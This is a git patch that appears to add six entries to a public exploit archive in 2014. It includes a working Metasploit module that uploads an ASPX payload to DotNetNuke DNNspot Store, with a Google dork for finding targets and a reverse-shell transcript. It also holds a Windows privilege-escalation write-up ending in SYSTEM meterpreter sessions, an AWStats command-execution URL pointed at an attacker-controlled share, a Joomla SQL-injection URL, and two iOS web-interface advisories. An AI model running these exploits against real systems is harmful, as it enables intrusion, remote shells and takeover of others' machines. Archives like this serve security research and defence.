From b7c11b0dcd3c636e9286285f4a42f110027952b5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 24 Oct 2014 04:45:15 +0000 Subject: [PATCH] Updated 10_24_2014 --- files.csv | 6 + platforms/cgi/webapps/35035.txt | 13 ++ platforms/ios/webapps/35037.txt | 240 +++++++++++++++++++++++++++++ platforms/ios/webapps/35038.txt | 213 +++++++++++++++++++++++++ platforms/php/webapps/35036.txt | 7 + platforms/windows/local/35040.txt | 108 +++++++++++++ platforms/windows/webapps/35039.rb | 111 +++++++++++++ 7 files changed, 698 insertions(+) create mode 100755 platforms/cgi/webapps/35035.txt create mode 100755 platforms/ios/webapps/35037.txt create mode 100755 platforms/ios/webapps/35038.txt create mode 100755 platforms/php/webapps/35036.txt create mode 100755 platforms/windows/local/35040.txt create mode 100755 platforms/windows/webapps/35039.rb diff --git a/files.csv b/files.csv index cb7e21d95..d16d5bb9b 100755 --- a/files.csv +++ b/files.csv @@ -31548,3 +31548,9 @@ id,file,description,date,author,platform,type,port 35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,metasploit,windows,remote,0 35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart Unserialize Remote Code Execution",2014-10-21,metasploit,php,remote,80 35034,platforms/multiple/remote/35034.rb,"HP Data Protector EXEC_INTEGUTIL Remote Code Execution",2014-10-21,metasploit,multiple,remote,5555 +35035,platforms/cgi/webapps/35035.txt,"Awstats 6.x Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability",2010-11-30,StenoPlasma,cgi,webapps,0 +35036,platforms/php/webapps/35036.txt,"Annuaire Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0 +35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - File Inclusion Vulnerability",2014-10-22,Vulnerability-Lab,ios,webapps,8000 +35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-22,Vulnerability-Lab,ios,webapps,80 +35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload",2014-10-22,"Glafkos Charalambous ",windows,webapps,0 +35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous ",windows,local,0 diff --git a/platforms/cgi/webapps/35035.txt b/platforms/cgi/webapps/35035.txt new file mode 100755 index 000000000..e243b9bb0 --- /dev/null +++ b/platforms/cgi/webapps/35035.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/45123/info + +Awstats is prone to an arbitrary command-execution vulnerability. This issue occurs when Awstats is used along with Apache Tomcat in Microsoft Windows. + +An attacker can exploit this vulnerability to execute arbitrary shell commands in the context of the webserver process. This may help attackers compromise the underlying system; other attacks are also possible. + +AWStats 6.95 and prior versions are vulnerable. + +Attacking Windows XP Apache Tomcat AWStats Server: +http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav + +Attacking Windows 2003 or Windows XP AWStats Server: +http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share \ No newline at end of file diff --git a/platforms/ios/webapps/35037.txt b/platforms/ios/webapps/35037.txt new file mode 100755 index 000000000..d46637283 --- /dev/null +++ b/platforms/ios/webapps/35037.txt @@ -0,0 +1,240 @@ +Document Title: +=============== +iFunBox Free v1.1 iOS - File Include Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1344 + + +Release Date: +============= +2014-10-20 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1344 + + +Common Vulnerability Scoring System: +==================================== +6.4 + + +Product & Service Introduction: +=============================== +iFunBox is a powerful file transfer and manage tool. You can use it to transfer files between Apple devices. +It’s also a full-function file explorer, with user-friendly UI and simple operations. + +(Copy of the Homepage: https://itunes.apple.com/de/app/ifunbox-free/id882209383 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official iFunBox Free v1.1 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-10-20: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Nguyen Anh +Product: iFunBox Free - iOS Mobile Web Application 1.1 + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official iFunBox Free v1.1 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system +specific path commands to compromise the mobile web-application. + +The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious +`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs +in the index dir listing of the wifi interface context. The attacker is able to inject the local file include request by usage of the `wifi +interface` in connection with the vulnerable upload request. + +Remote attackers are also able to exploit the filename/albumname validation issue in combination with persistent injected script codes to execute +different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. +Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation +of the local file include web vulnerability results in mobile application or connected device component compromise. + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] Upload (File) + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] iToolZip Wifi Interface (localhost:80000) + + +Proof of Concept (PoC): +======================= +The local file include vulnerability can be exploited by local attackers without user interaction or privileged application user account. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/app/ifunbox-free/id882209383] +2. Start the app and push in the right top corner the wifi transfer button +3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:8000) +4. Now, the attacker uploads a file and tampers the request to manipulate the session information live +Note: He injects a payload to request a local file through the vulnerable filename value in the upload POSt emthod request +5. The code execution occurs in the inject in the wifi file dir listing web interface index (localhost:8000:8000/./[LOCAL FILE INCLUDE VULNERABILITY!].png) +6. Successful reproduce of the security vulnerability! + + +PoC: index.html (Name) [createdir?path=] + +
+ + + +
NameDownloadDelete
<./[LOCAL FILE INCLUDE VULNERABILITY!].png">./[LOCAL FILE INCLUDE VULNERABILITY!].png +
Applications +Documents +GamesMusicsPictures +Videos + + +--- PoC Session Logs [GET] --- +Status: 302[Found] +POST http://localhost:8000:8000/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8000:8000] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8000:8000/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------94243140032725 +Content-Disposition: form-data; name="newfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png" +Content-Type: image/png +- +Status: 200[OK] +GET http://localhost:8000:8000/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[5753] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8000:8000] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8000:8000/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[5753] + Date[Sun, 19 Oct 2014 17:05:59 GMT] +- +Status: 200[OK] +GET http://localhost:8000:8000/files?p= Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[369] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8000:8000] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[application/json, text/javascript, */*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8000:8000/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[369] + Date[Sun, 19 Oct 2014 17:06:00 GMT] +- +Status: 200[OK] +GET http://localhost:8000:8000/./[LOCAL FILE INCLUDE VULNERABILITY!].png Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8000:8000] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8000:8000/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[0] + Date[Sun, 19 Oct 2014 17:06:01 GMT] + + +Solution - Fix & Patch: +======================= +The file include web vulnerability can be patched by a secure parse and encode of the filename in the upload POST method request. +To prevent the execution filter the input and restrict it on input but encode also the iToolZip wifi interface file dir list with the vulnerable name output value. + + +Security Risk: +============== +The security risk of the local file include web vulnerability in the iToolZo wifi web interface is estimated as high. (CVSS 6.4) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either +expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2014 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/ios/webapps/35038.txt b/platforms/ios/webapps/35038.txt new file mode 100755 index 000000000..eab0c86f3 --- /dev/null +++ b/platforms/ios/webapps/35038.txt @@ -0,0 +1,213 @@ +Document Title: +=============== +File Manager v4.2.10 iOS - Code Execution Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1343 + + +Release Date: +============= +2014-10-21 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1343 + + +Common Vulnerability Scoring System: +==================================== +9 + + +Product & Service Introduction: +=============================== +Try a file manager that’s unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox, +Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of +your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive +formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well +as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move +a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy! + +(Copy of the Homepage: https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application. + + +Vulnerability Disclosure Timeline: +================================== +2014-10-21: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +DevelSoftware LTD +Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Critical + + +Technical Details & Description: +================================ +A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application. +The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code +execution vulnerability in the wifi interface. + +The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value +without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by +usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file +next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app +and the request method to inject is GET. + +The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8 +Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction. +Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise. + + +Request Method(s): + [+] GET + +Vulnerable Module(s): + [+] Create Folder + +Vulnerable Parameter(s): + [+] createdir?path=(name) + +Affected Module(s): + [+] Wifi Interface (index.html) + + +Proof of Concept (PoC): +======================= +The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881] +2. Start the app and push in the left corner the wifi transfer button +3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80) +4. Now, inject own code as payload by usage of the create folder input field +Note: The input field requests the path value directly via GET method request without secure parse or encode +5. The code execution occurs directly after the inject in the index.html file of the web interface +6. Successful reproduce of the security vulnerability! + + +PoC: index.html (Name) [createdir?path=] + +
+ + + + + + + +
+
+
+ + + + +
NameExtSize
>-[CODE EXECUTION VULNERABILITY!]>dir
testfolder1dir
testfolder2dir
+ + +--- PoC Session Logs [GET] --- +Status: 200[OK] +GET http://localhost:80/createdir?path=%2F%3E%22%3C-[CODE EXECUTION VULNERABILITY!];%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[43] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:80/index.html] + Connection[keep-alive] + Response Header: + Connection[Keep-Alive] + Content-Length[43] + + +Status: 200[OK] +GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:80/index.html] + Connection[keep-alive] + Response Header: + Connection[Close] + Date[Sun, 19 Oct 2014 16:22:46 GMT] + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the +index.html file to prevent application-side code execution attacks. + + +Security Risk: +============== +The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either +expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2014 | Vulnerability Laboratory [Evolution Security] + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/php/webapps/35036.txt b/platforms/php/webapps/35036.txt new file mode 100755 index 000000000..b92283277 --- /dev/null +++ b/platforms/php/webapps/35036.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45147/info + +The Annuaire component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi] \ No newline at end of file diff --git a/platforms/windows/local/35040.txt b/platforms/windows/local/35040.txt new file mode 100755 index 000000000..f48439c15 --- /dev/null +++ b/platforms/windows/local/35040.txt @@ -0,0 +1,108 @@ +# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation +# Date: 23/01/2014 +# Author: Glafkos Charalambous +# Version: 10.0.0.32 +# Vendor: IBackup +# Vendor URL: https://www.ibackup.com/ +# CVE-2014-5507 + + +Vulnerability Details +There are weak permissions for IBackupWindows default installation where everyone is allowed to change +the ib_service.exe with an executable of their choice. When the service restarts or the system reboots +the attacker payload will execute on the system with SYSTEM privileges. + + +C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe" +C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(RX) + +Successfully processed 1 files; Failed processing 0 files + + +C:\Users\0x414141>sc qc IBService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: IBService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : IBackup Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + + +msf exploit(service_permissions) > sessions + +Active sessions +=============== + + Id Type Information Connection + -- ---- ----------- ---------- + 1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102) + + + +msf exploit(service_permissions) > show options + +Module options (exploit/windows/local/service_permissions): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AGGRESSIVE true no Exploit as many services as possible (dangerous) + SESSION 1 yes The session to run this module on. + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none) + LHOST 192.168.0.100 yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + +msf exploit(service_permissions) > exploit + +[*] Started reverse handler on 192.168.0.100:4444 +[*] Meterpreter stager executable 15872 bytes long being uploaded.. +[*] Trying to add a new service... +[*] No privs to create a service... +[*] Trying to find weak permissions in existing services.. +[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced. +[*] Restarting IBService +[*] Could not restart IBService. Wait for a reboot. (or force one yourself) + +Upon Reboot or Service Restart + +[*] Sending stage (770048 bytes) to 192.168.0.102 +[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300 +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > background +[*] Backgrounding session 2... + +msf exploit(service_permissions) > sessions -l + +Active sessions +=============== + + Id Type Information Connection + -- ---- ----------- ---------- + 1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102) + 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ 0x414141-PC 192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102) + + diff --git a/platforms/windows/webapps/35039.rb b/platforms/windows/webapps/35039.rb new file mode 100755 index 000000000..ee30ffb84 --- /dev/null +++ b/platforms/windows/webapps/35039.rb @@ -0,0 +1,111 @@ +?# Exploit Title: DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload +# Date: 23/01/2014 +# Author: Glafkos Charalambous +# Version: 3.0.0 +# Vendor: DNNspot +# Vendor URL: https://www.dnnspot.com +# Google Dork: inurl:/DesktopModules/DNNspot-Store/ +# +# root@kali:~# msfcli exploit/windows/http/dnnspot_upload_exec payload=windows/shell/reverse_tcp LHOST=192.168.13.37 LPORT=31337 RHOST=192.168.31.33 RPORT=80 E +# [*] Initializing modules... +# payload => windows/shell/reverse_tcp +# LHOST => 192.168.13.37 +# LPORT => 31337 +# RHOST => 192.168.31.33 +# [-] Handler failed to bind to 192.168.13.37:31337 +# [*] Started reverse handler on 0.0.0.0:31337 +# [*] 192.168.31.33:80 - Uploading payload... +# [*] 192.168.31.33:80 - Executing payload trrnegmv.aspx +# [*] Encoded stage with x86/shikata_ga_nai +# [*] Sending encoded stage (267 bytes) to 192.168.31.33 +# [*] Command shell session 1 opened (192.168.13.37:31337 -> 192.168.31.33:56806) at 2014-08-28 20:56:23 +0300 +# [+] Deleted trrnegmv.aspx +# +# Microsoft Windows [Version 6.2.9200] +# (c) 2012 Microsoft Corporation. All rights reserved. +# +# C:\Windows\SysWOW64\inetsrv> +# + + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload', + 'Description' => %q{ + This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store + module versions below 3.0.0. + }, + 'Author' => + [ + 'Glafkos Charalambous ' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://metasploit.com' ] + ], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Privileged' => false, + 'Targets' => + [ + [ 'DNNspot-Store / Windows', {} ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jul 21 2014')) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx") + }) + + if res and res.code == 200 + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def exploit + @payload_name = "#{rand_text_alpha_lower(8)}.aspx" + exe = generate_payload_exe + aspx = Msf::Util::EXE.to_exe_aspx(exe) + post_data = Rex::MIME::Message.new + post_data.add_part(aspx, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") + post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data; name=\"folder\"") + post_data.add_part("1", nil, nil, "form-data; name=\"productId\"") + post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"") + data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + print_status("#{peer} - Uploading payload...") + res = send_request_cgi({ + "method" => "POST", + "uri" => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"), + "data" => data, + "ctype" => "multipart/form-data; boundary=#{post_data.bound}" + }) + + unless res and res.code == 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") + end + + register_files_for_cleanup(@payload_name) + + print_status("#{peer} - Executing payload #{@payload_name}") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name) + }) + end +end